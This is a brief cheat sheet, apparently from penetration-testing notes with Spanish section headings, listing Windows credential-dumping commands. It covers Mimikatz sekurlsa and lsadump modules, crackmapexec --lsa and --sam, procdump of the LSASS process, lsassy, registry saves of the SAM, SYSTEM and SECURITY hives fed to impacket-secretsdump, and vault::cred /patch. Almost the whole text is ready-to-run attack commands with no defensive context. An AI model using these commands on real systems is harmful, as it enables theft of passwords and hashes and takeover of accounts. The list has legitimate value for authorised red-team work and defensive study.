Copy mimikatz.exe
Invoke-Mimikatz.ps1
SharpKatz.exe
pypykatz.exe
3.2. Credenciales en memoria (LSASS)
Copy Invoke-Mimikatz - Command '"sekurlsa::ekeys"'
Invoke-Mimikatz - Command '"sekurlsa::logonpasswords"'
Copy crackmapexec smb < IP > - u < USER > - p < PASS > -- lsa
Copy 1 - Get-Process - Name LSASS
2 - .\\ procdump.exe - ma < ProcNum > lsass.dmp
Copy lsassy - u < USER > - H < NTLM > - d < domain.full > < IP > -- users
3.3. Credenciales locales (SAM)
Copy 1 - reg save HKLM\\sam sam
2 - reg save HKLM\\system system
3 - reg save HKLM\\security security
4 - impacket - secretsdump - sam sam - security security - system system LOCAL
Copy Invoke-Mimikatz - Command '"lsadump::sam"'
Copy crackmapexec smb < IP > - u < USER > - p < PASS > -- sam
Copy Invoke-Mimikatz - Command '"vault::cred /patch"'